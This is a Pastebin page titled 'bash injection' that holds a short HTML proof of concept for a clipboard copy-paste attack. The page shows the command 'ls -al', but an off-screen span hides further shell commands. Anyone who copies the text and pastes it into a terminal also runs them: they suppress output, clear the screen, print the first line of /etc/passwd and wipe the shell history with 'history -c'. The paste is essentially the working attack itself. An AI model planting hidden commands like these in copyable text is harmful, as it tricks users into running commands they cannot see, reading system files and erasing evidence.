Advertisement
x1622sec

bash injection

Nov 16th, 2015
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.35 KB | None | 0 0
  1. <html>
  2. <head>
  3. </head>
  4. <body>
  5.  
  6. Directory Listing (long format):
  7.  
  8. <p class="bashinjection">
  9. ls
  10. <span style="position: absolute; left: -100px; top: -100px">
  11.     >/dev/null;
  12.         clear;
  13.         echo "first line passwd";
  14.         echo;head -1 /etc/passwd;
  15.         history -c
  16.         <br>
  17.         ls
  18.  </span>
  19.   -al
  20.  </p>
  21.  
  22. </body>
  23. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement